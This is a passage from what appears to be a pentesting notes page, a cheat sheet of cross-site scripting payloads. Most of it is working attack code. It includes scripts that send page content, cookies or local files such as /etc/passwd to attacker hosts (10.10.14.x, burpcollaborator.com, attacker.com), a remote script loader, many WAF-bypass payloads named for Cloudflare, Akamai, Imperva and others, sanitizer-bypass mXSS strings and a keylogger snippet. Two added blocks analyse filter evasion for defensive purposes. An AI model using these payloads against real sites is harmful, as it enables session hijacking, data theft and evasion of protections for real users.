fetch("http://domain.htb/index.php?page=existing_page")
    .then(response => response.text())
    .then(data => {
        fetch("http://10.10.14.49/?data=" + encodeURIComponent(data));
    })
    .catch(error => console.error("Error fetching the messages:", error));
</script>
```

If that does not work, host a JS file on your web server and fetch it instead:

xss.js:

```javascript
fetch('/api/info')
    .then(response => response.text())  // Get the response body as text
    .then(text => {
        // Send the base64-encoded response to your server
        fetch('http://10.10.14.44/data?' + btoa(text), { mode: 'no-cors' });
    });
```

Payload:

```javascript
<img src=1 onerror="var s=document.createElement('script'); s.src='http://10.10.14.44/xss.js'; document.body.appendChild(s);">
```

## XSS in an email / username

```
"><Svg/OnLoad=alert(1)>"@gmail.com
```

XSS in an email address is underrated (email fields are rarely sanitized by companies). Use a catch-all mailbox on your own domain, so that you can also verify the account if required.

`"><img/src/onerror=import('//domain/')>"@yourdomain.com`

```
test+(<script>alert(0)</script>)@example.com
```

{% embed url="<https://twitter.com/zseano/status/1784317870282817755>" %}

## XSS in phone number

```
+441134960000;phone-context=<script>alert(1)</script>
```

{% embed url="<https://x.com/intigriti/status/1814587805558886576?s=03&t=qgiB29Wg31VI3jmMYESgFQ>" %}

## Textarea

```
</textarea><img src="x" onerror="alert(1)">
```

## XSS in .css file

```
"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2Fd74mbTofWU00oS1Inwm9%2FGHewhTgW4AAvqVs.jpg?alt=media&#x26;token=d36d4a3d-1ad2-428a-9b3b-815b4dc65399" alt=""><figcaption></figcaption></figure>

## XSS.SWF

{% embed url="<https://github.com/evilcos/xss.swf>" %}

```
# https://github.com/evilcos/xss.swf
<object data="//hacker.site/xss.swf">
<embed code="//hacker.site/xss.swf" allowscriptaccess=always>
```

## SVG Tag - Confuse filters

```
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
```

```svg
<svg>
  <script>
    /*
    <![CDATA[*]]><![CDATA[/]]>alert(1)-/\*/
  </script>
</svg>
```

Source: <https://x.com/garethheyes/status/1843331462004912389?t=wmNCIF85tvyXZ21GMJ9B6w&s=03>

```svg
<svg> <script> 1<![CDATA[</script>]]>/-alert(1) </script> </svg>

<svg> <script> /* <![CDATA[*]]><![CDATA[/]]>alert(1)-/\*/ </script> </svg>
```

```svg
<svg><use><set attributeName="href" to="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg'&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />
```

Source: <https://x.com/0x0SojalSec/status/1844806824983413002?t=sfLD3yJAVRjsXew1YJ40QA&s=03>

```svg
<svg>
<script>alert<![CDATA[<!---->]]>
(1)</script></svg>
```

```svg
<svg><script>
eval('a<?>l<!>e</>rt(1)')
</script></svg>
```

```svg
<svg>
<script>
<!---->a<!---->l<!---->e<!---->r<!---->t<!---->(<!---->1<!---->)
</script>
</svg>
```

## XSS Polyglots

{% embed url="<https://github.com/coffinxp/payloads/blob/main/xsspollygots.txt>" %}

{% embed url="<https://brutelogic.com.br/blog/building-xss-polyglots/>" %}

{% embed url="<https://medium.com/@0xAwali/let-me-bxss-em-all-72832064dd83>" %}

```javascript
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source), s.stack=Error().stack, s.src=(/,/+/oastify.com/).slice(2), document.documentElement.appendChild(s))//'>
```

```javascript
</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=(alert)(1337)>
/*'/*\'/*"/*\"/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//>
<!-->/*'/*\'/*"/*\"/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//-->
<!-->/*'/*\'/*"/*\"/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//><Base/Href=//X55.is\76-->
<!-->/*'/*\'/*"/*\"/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/;{(alert)(1337)}//><Base/Href=//X55.is\76-->
<!-->/*'/*\'/*"/*\"/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76-->
<!-->/*'/*\'/*"/*\"/*`/*\`/*%26apos;)/*%0D%0AContent-Type:text/html%0D%0A%0D%0A</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76-->
JavaScript://%250Aalert?.(1)//*'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76-->
```

## XSS Cuneiform-alphabet based

`𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()`

{% embed url="<https://twitter.com/RootMoksha/status/1782295118504173919>" %}

### In search bar

`http://url.com/search?title=\><xss_payload>`

```
"><img/src=x onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(document.domain)')()"
```

## ISO-2022-JP

{% embed url="<https://hackvertor.co.uk/hack-pad/5>" %}

## Invisible Javascript

<https://x.com/aemkei/status/1843756978147078286>

{% embed url="<https://blog.worldline.tech/2023/07/19/invisible-code.html>" %}

{% embed url="<https://benjaminaster.com/invisible-javascript/?s=03>" %}

## XSS using github pages

{% embed url="<https://github.com/yogsec/xss-test>" %}

## Header Injection

{% content-ref url="http-header-exploitation" %}
[http-header-exploitation](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/http-header-exploitation)
{% endcontent-ref %}

## Server Side - PDF Generator

```
<iframe src=file:///etc/passwd></iframe>
```

{% embed url="<https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf>" %}

{% content-ref url="ssrf" %}
[ssrf](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/ssrf)
{% endcontent-ref %}

## XSS to read local file

```javascript
<script>
    x=new XMLHttpRequest;
    x.onload=function(){
        document.write(this.responseText)
    };
    x.open("GET","file:///etc/passwd");
    x.send();
</script>
```

```javascript
<script>
    function addNewlines(str) {
        var result = '';
        while (str.length > 0) {
            result += str.substring(0, 100) + '\n';
            str = str.substring(100);
        }
        return result;
    }

    x = new XMLHttpRequest();
    x.onload = function(){
        document.write(addNewlines(btoa(this.responseText)))
    };
    x.open("GET", "file:///etc/passwd");
    x.send();
</script>
```

```javascript
<script>
    var readfile = new XMLHttpRequest(); // Read the local file
    var exfil = new XMLHttpRequest();    // Send the file to our server
    readfile.open("GET", "file:///var/www/html/dev-text.php", true);
    readfile.send();
    readfile.onload = function() {
        if (readfile.readyState === 4) {
            var url = 'http://burpcollaborator.com?data=' + btoa(this.response);
            exfil.open("GET", url, true);
            exfil.send();
        }
    }
    readfile.onerror = function() { document.write('<a>Oops!</a>'); }
</script>
```

```javascript
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
```

```javascript
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>
```

{% embed url="<https://blog.dixitaditya.com/xss-to-read-internal-files>" %}

## Prototype Pollution

{% embed url="<https://research.securitum.com/wp-content/uploads/sites/2/2020/08/ScreenFlow.mp4>" %}

{% embed url="<https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/>" %}

## For Red Teaming

{% embed url="<https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams?s=03>" %}

{% embed url="<https://github.com/hoodoer/JS-Tap>" %}

{% embed url="<https://github.com/Sharpforce/XSS-Exploitation-Tool>" %}

### XSS Keylogger

{% embed url="<https://github.com/11whoami99/XSS-keylogger/tree/main>" %}

## XSS With JSFuck

{% embed url="<https://jsfuck.com/>" %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FotIrS2L1HMN1gfT0WS1N%2FGfQSg8dWMAAx4yk.jpg?alt=media&#x26;token=adc394b8-1293-4472-9601-a80ff0615bcd" alt=""><figcaption></figcaption></figure>

Convert `document.location='http://attacker.com?'+document.cookie` with JSFuck.

Put the result inside `<button autofocus onfocus=(eval)([JSFuck])></button>`

## WAF Bypass

{% content-ref url="waf-bypass" %}
[waf-bypass](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/waf-bypass)
{% endcontent-ref %}

```javascript
"><input%0a%0atype="hidden"%0a%0aoncontentvisibilityautostatechange=confirm(/Bypassed/)%0d%0astyle=content-visibility:auto>
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">
<p oncontentvisibilityautostatechange="alert(/FirefoxOnly/)" style="content-visibility:auto">
```

```
# alert(origin):

W=!![];H=(W+"")[3];di="al";me="rt";qq="( origin )";meydi=di+H+me+qq;[]["fill"]["constructor"](meydi)()
```

### Bypass Filters

{% embed url="<https://d3adend.org/xss/ghettoBypass>" %}

{% embed url="<https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet>" %}

{% embed url="<https://johnermac.github.io/notes/ewptx/xssfilter/>" %}

{% embed url="<https://brutelogic.com.br/blog/bypassing-whitelists-with-xss-payloads-in-attributes/>" %}

```html
# JavaScript and brackets () filtered

<a href="jav&#x0A;ascript:&#x0A;confirm``">click me</a>
```

```
# Bypass filters

## filter that removes any script tags.
<img src="test" onerror=alert("Hello") />

## alert is filtered
<img src="test" onerror=confirm("Hello") />

## The word hello is filtered
<img src="test" onerror=alert("HHelloello") />
```

```
1) alert = window["al"+"ert"] 
2) bypass () with `` 
3) replace space with / 
4) encode symbols: 
< = %3c 
> = %3e 
" = %22 
[ = %5b 
] = %5d 
` = %60
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FOeQ42PeOv61fRk9dZ2Em%2FGZm881zXEAE83DZ.jpg?alt=media&#x26;token=795f02b9-75ee-40b0-ae6f-1e77ceb389d6" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/Edr4/XSS-Bypass-Filters>" %}

```javascript
1%27/prompt?.(1)/%27
*prompt(document.domain)*
"><img src=x onerrora=confirm() onerror=confirm(1)>
<img//////src=x oNlY=1 oNerror=alert('xxs')//
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt1>
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`//>
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
<Img Src=OnXSS OnError={prompt`1`}>
<svg/ONxss='0'/ONload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
"><div/onclick="(function(){setTimeout(()%20=>%20alert(document.domain),%200);})();">Click%20me!</div>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<iframe+/ON+onload=%20alert(/str0d/)>
<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
"><body/onload="{x:onerror=alert};x"
<svg/%20src=x%20onmouseover%3D%22alert%26%230000000040%3B1)
<Img Src=OnXSS OnError=confirm(1)>
```

Bypass for Akamai, Imperva and Cloudflare:

```
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
```

{% embed url="<https://github.com/coffinxp/payloads/blob/main/xsswafbypss.txt>" %}

```
"&quot;"ontoggle=[JS]
"' &quot;'"ontoggle=[JS]
```

{% embed url="<https://onetest.fr/posts/xss-waf-bypass-one-payload-for-all/>" %}

Use these tricks when the WAF blocks the literal `alert`:

```
(function(x){this[x+`ert`](1)})`al` 

window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2) 

document['default'+'View'][`\u0061lert`](3)

parent[/al/.source+/ert/.source](1)

parent[/al/.source.concat(/ert/.source)](2)
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FlCU2ILC8Y2IcjZkbI6YB%2FGQl0gOnWsAAEr7o.jpg?alt=media&#x26;token=a38c3d9d-39d2-46c0-a959-305450682b1d" alt=""><figcaption></figcaption></figure>

```
confirm?.(1)
```
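As an added example (not from the page), the harness below shows why a signature such as `alert(` misses the tricks above. `alert` and `confirm` are stubs that record their arguments, and the browser aliases `window`, `top`, `parent` and `document.defaultView` are emulated on `globalThis` so the list runs under Node as well as in a page; the rule regex is an assumed stand-in for a vendor signature, not a real one.

```javascript
// Added example (not from the page): keyword rule versus dynamic property lookups.

const calls = [];
const g = globalThis;
g.alert = (...args) => { calls.push(['alert', ...args]); };
g.confirm = (...args) => { calls.push(['confirm', ...args]); };
g.window = g.top = g.parent = g;        // in a browser these all alias the window
g.document = { defaultView: g };

// Keyword rule: function name, optional whitespace, opening parenthesis.
const RULE = /\b(alert|confirm|prompt)\s*\(/i;
const blockedByRule = (payload) => RULE.test(payload);

// Run a payload the way an inline handler would: Function() compiles sloppy-mode
// code, so `this` in a plain call is the global object. Returns the recorded call.
function execute(payload) {
  calls.length = 0;
  new Function(payload)();
  return calls.length ? calls[0] : null;
}

const PAYLOADS = [
  '(function(x){this[x+`ert`](1)})`al`',          // tagged template: x is ["al"], x+"ert" is "alert"
  'window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)',        // /e/.exec`e` is ["e"], which concatenates as "e"
  "document['default'+'View'][`\\u0061lert`](3)",  // \u0061 is "a" inside the template literal
  'parent[/al/.source+/ert/.source](4)',
  'parent[/al/.source.concat(/ert/.source)](5)',
  'confirm?.(6)',                                   // optional call: the text never contains "confirm("
  '(a=alert,b=7,a(b))',                             // alias first, call later
];

// For each payload: whether the rule fired and which call actually ran.
function evaluate(payloads = PAYLOADS) {
  return payloads.map((payload) => ({ payload, blocked: blockedByRule(payload), ran: execute(payload) }));
}

// The plain form is what the rule was written for.
const baselineBlocked = blockedByRule('alert(1)');
```

Every entry in `PAYLOADS` resolves to the same function object at run time while never containing the byte sequence the rule looks for; that gap between the text a WAF sees and the property the engine resolves is the whole reason keyword blocking of `alert` is a weak control.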

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FDUGRY1SFLdHoL8ZhbsfY%2FGQkBy6gWEAAI9z2.png?alt=media&#x26;token=dbb337f4-670d-4642-b880-495465f94f00" alt=""><figcaption></figcaption></figure>

```javascript
// Cloudflare
<Img Src=OnXSS OnError=alert(1)>

// Imperva
<Img Src=//X55.is OnLoad%0C=import(Src)//

// Akamai
<A AutoFocus HRef %252F=""OnFocus=top/**/?.['al'%2B'ert'](1)>

// A comment (plain or entity-encoded) between the function name and its argument list
<svg/onload=alert/*1337*/(1)>
<svg/onload=alert//&NewLine;(2)>
<svg/onload=alert&sol;**&sol;(3)>
<svg/onload=alert/&#42;&#42;/(4)>
<svg/onload=alert&#x2F;**&#47;(5)>
```

Amazon / Cloudflare WAF bypass:

```javascript
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
```

```javascript
1">K='><Svg OnLoad=(confirm)(1)>
```

```javascript
<a/href="javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">ClickMe
```

### mXSS (Mutation XSS)

{% embed url="<https://jorianwoltjer.com/blog/p/hacking/mutation-xss>" %}

<https://x.com/therceman/status/1862093437467496722?t=SZ07gfch6y1Zmj83xC6whA&s=03>

**mXSS (Mutation XSS)** occurs when the browser re-serializes and re-parses markup and, in doing so, turns input that looked harmless at filter time into executable content: the sanitizer and the browser disagree about where a tag or attribute ends, so the payload passes the filter and still executes.

Libraries such as DOMPurify are built to resist this, but several versions have been bypassed by researchers who found new ways to make the browser mutate the markup after sanitization.

Many developers are not aware of DOMPurify, or choose not to use it and instead write their own filters or validators for "safe HTML". Custom filters of that kind are where mXSS is particularly effective.

```javascript
<iframe><style id="</iframe><img src=1 onerror=alert(1337)>">
<noframes><style id="</noframes><img src=1 onerror=alert(1337)>">
<noscript><p id="</noscript><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src="1" onerror="alert(1337)">">"&gt;
<svg><style><img src="1" onerror="alert(1337)">
<math><style><img src="1" onerror="alert(1337)">
<math><style></style></math><img src="1" onerror="alert(1337)">
<select><style><input><img src=1 onerror=alert(1337)></select>
<select></select><input><img src="1" onerror="alert(1337)">
<body><title><p id="</title><img src onerror=alert(1337)>"></title>
<body><noscript><p id="</noscript><img src onerror=alert(1337)>">
<maths><style><!--</style><img src onerror=alert(1337)>--></style></maths>
<svg><style>/*<img src onerror=alert(1337)>*/</style></svg>
<math><style>/*<img src onerror=alert(1337)>*/
<noscript><style>/*</noscript><img src onerror=alert(1337)>*/
<math><annotation-xml><style><img src onerror=alert(1337)></style></annotation-xml></math>
<body><textarea><a is="</textarea><img src onerror=alert(1337)>">
<math><annotation-xml encoding="text/html"><x><svg><mtext><textarea><a is="</textarea><img src onerror=alert(1337)>">
<form><math><mtext></form><form><mglyph><svg><mtext><title><path is="</title><img src onerror=alert(1337)>">
```

{% embed url="<https://ensy.zip/posts/dompurify-323-bypass/>" %}

```javascript
<math><foo-test><mi><li><table><foo-test><li></li></foo-test><a>
      <style>
        <! \${
      </style>
      }
      <foo-b id="><img src onerror='alert(1)'>">hmm...</foo-b>
    </a></table></li></mi></foo-test></math>
```

### WhatWaf

{% embed url="<https://github.com/Ekultek/WhatWaf>" %}

### CloudFlare

Payload: `%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E`

{% embed url="<https://twitter.com/grumpzsux/status/1784432507565625672>" %}

```javascript
<Img Src=OnXSS OnError=confirm(document.cookie)>
```

```javascript
'>alert(154)</script><script/154=';;;;;;;
```

```javascript
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

"><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))>
```

```javascript
<svg/onload=window["al"+"ert"](1337)>
<Img Src=OnXSS OnError=confirm(1337)>
<Svg Only=1 OnLoad=confirm(document.domain)>
<svg onload=alert&#0000000040document.cookie)>
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
OnXSS=<Img/Src/OnError=alert(1)>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
'<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/
<Img/Src/OnError=(alert)(1)>
```

The next payloads contain zero-width spaces (U+200B) inside `style`, `onload` and `onerror`; they are invisible here, so copy the lines rather than retyping them.

```javascript
<select><​style></select>
<svg onload​=alert(1)>
<​/style>
```

```javascript
"><img src=x onerrora=confirm() onerror​=confirm(1)>
```

```javascript
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
```

```javascript
<svg onload​=alert&#0000000040"1")><"">
```

```
Normal payload :
";alert(1)// ( 403 Blocked By Cloudflare ) 

Bypass :
";(a=alert,b=1,a(b))// ( 200 OK ) 
```

### CloudFront

```javascript
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/*aabb*/['al'%2b'ert'](document./*aabb*/location);//
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>
```

### Akamai

```javascript
<a%20href=%0dj&Tab;avascript&colon;x='trela'.split('').reverse().join('');self[x](origin)>
```

```javascript
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
```

```javascript
 <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
```

Akamai: Stored XSS via cache poisoning <https://twitter.com/WllGates/status/1788179999100444802>

```javascript
"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
```

Akamai:

```javascript
'"><A HRef=" AutoFocus OnFocus=top/**/?.'ale'%2B'rt'>"
';k='e'%0Atop['al'+k+'rt'](1)//
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
```

In a redirect parameter, combining HTTP parameter pollution with double URL encoding:

```
/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529
```

### Imperva

{% embed url="<https://github.com/BishopFox/Imperva_gzip_WAF_Bypass>" %}

```javascript
<Img Src=//X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9;//</div">
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
```

### Sucuri

```
<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe

<a href="j&#97;vascript&#x3A;&#97;lert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window&#46;location&#46;href='https://evil.com';">ClickMe</a>
```
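The encoded `javascript:` links above (the `jav&#x0A;ascript:` trick in the filter-bypass section, Akamai's `j&Tab;avascript&colon;` and Sucuri's `j&#97v&#97script&#x3A;`) all work the same way, and the following added example (not code from the page) reproduces what the browser does with them: the attribute value is first decoded as HTML character references, then parsed as a URL, and the WHATWG URL parser drops ASCII tab/LF/CR anywhere in the input and C0 controls at either end, so the scheme still comes out as `javascript:`. Node's `URL` class implements that parser; the named-entity table is a deliberately small subset and the benign control sample is constructed.

```javascript
// Added example (not from the page): entity decoding followed by URL parsing,
// i.e. the normalization a sanitizer must do before it looks at the scheme.

const NAMED = new Map([
  ['Tab', '\t'], ['NewLine', '\n'], ['colon', ':'], ['sol', '/'],
  ['lt', '<'], ['gt', '>'], ['quot', '"'], ['amp', '&'], ['apos', "'"],
]);
const ENTITY = /&(?:#[xX]([0-9a-fA-F]+)|#([0-9]+)|([A-Za-z]+));?/g;
const fromCp = (cp) => (cp <= 0x10ffff ? String.fromCodePoint(cp) : '\uFFFD');

// Decode numeric references (HTML tolerates a missing ;) and the named ones in
// the table; unknown names are left alone, as the HTML tokenizer does.
function decodeEntities(s) {
  return s.replace(ENTITY, (m, hex, dec, name) => {
    if (hex) return fromCp(parseInt(hex, 16));
    if (dec) return fromCp(parseInt(dec, 10));
    return NAMED.has(name) && m.endsWith(';') ? NAMED.get(name) : m;
  });
}

// Entity-decode, then URL-parse. Returns the scheme and what follows it, or a
// null scheme when the value is not an absolute URL (a relative link, for example).
function resolveHref(attrValue) {
  const decoded = decodeEntities(attrValue);
  try {
    const u = new URL(decoded);
    return { decoded, scheme: u.protocol, body: u.pathname };
  } catch {
    return { decoded, scheme: null, body: null };
  }
}

// The check a sanitizer has to make: decide on the scheme after decoding and
// normalizing, never on the raw attribute text.
const isJavascriptUrl = (attrValue) => resolveHref(attrValue).scheme === 'javascript:';

// Attribute values taken from the payloads above; the Akamai one starts with the
// CR that %0d becomes once the server has URL-decoded the parameter. The last
// entry is a constructed benign control.
const SAMPLES = [
  'jav&#x0A;ascript:&#x0A;confirm``',
  "\rj&Tab;avascript&colon;x='trela'.split('').reverse().join('');self[x](origin)",
  'j&#97v&#97script&#x3A;&#97lert(document.cookie)',
  'https://example.org/page',
];
```

A filter that matches `javascript:` against the raw attribute text sees none of the first three samples; one that checks `resolveHref(...).scheme` catches all of them, which is the check browser-side sanitizers such as DOMPurify perform on URL attributes.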

### Amazon WAF

```
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
```

### ModSecurity

```
<svg onload='new Function["Y000!"].find(al\u0065rt)'>

```

### RXSS (Reflected XSS)

```
<img src=x onerror=alert(document.domain)//
```

```
%3Csvg+on+onload%3D%28alert%29%28document.domain%29%3E
```

### Alert(1)

```
'a'.replace.call`1${/./}${alert}`/
```

```
[alert][0].call(this,1)
```

{% embed url="<https://twitter.com/bbr_bug/status/1782986740963426710?s=03&t=tC3J2e2WNH4B0Ly6S632Eg>" %}

### Stored XSS

```
https://www.target.com/redirectEndpoint.do?redirectPage=redacted&itemFromOrder="'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>


"'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>
```

{% embed url="<https://twitter.com/ott3rly/status/1783053325656572086?s=03&t=d-CTangBtY74Mf6sqmclbA>" %}

## ASP

IIS/ASP.NET decode `%uXXXX` sequences; `%u003C` is a plain `<`, and the other two rely on the server best-fit mapping U+3008 and U+FF1C to `<` when it converts to a legacy code page:

```
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uFF1Csvg onload=alert(3)>
```

ASP.NET joins repeated query parameters with a comma, so the two halves are reassembled server-side as `<svg/,onload=alert()>`:

```
parameter=<svg/&parameter=onload=alert()>
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FXUpjJCSTlifbHbFLsjJs%2Fimage.png?alt=media&#x26;token=5fae6e11-3d2a-430a-b74b-453195394736" alt=""><figcaption></figcaption></figure>

```
/(A(%22onerror='alert%60123%60'test))/
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F8dIBdHPqpB3E5twL7kVz%2Fimage.png?alt=media&#x26;token=4ff70339-15bc-49c5-aac7-bbff4c7b64a6" alt=""><figcaption></figcaption></figure>

## Keylogger

```html
<!-- Keylogger example - Source: TryHackMe -->
<script type="text/javascript">
  let l = ""; // Variable to store key-strokes in
  document.onkeypress = function (e) { // Event to listen for key presses
    l += e.key; // If user types, log it to the l variable
    console.log(l); // update this line to post to your own server
  };
</script>
```

## Resources

{% embed url="<https://www.yeswehack.com/learn-bug-bounty/xss-attacks-exploitation-ultimate-guide>" %}

{% embed url="<https://portswigger.net/web-security/cross-site-scripting>" %}

{% embed url="<https://www.hackerone.com/knowledge-center/how-xss-payloads-work-code-examples-preventing-them>" %}

{% embed url="<https://docs.veracode.com/r/cross-site-scripting-xss>" %}

{% embed url="<https://www.intigriti.com/hackademy/cross-site-scripting-xss>" %}

## Payloads

{% embed url="<https://testdintrusion.fr/pentest/web/injections%26inclusions/xss/>" %}

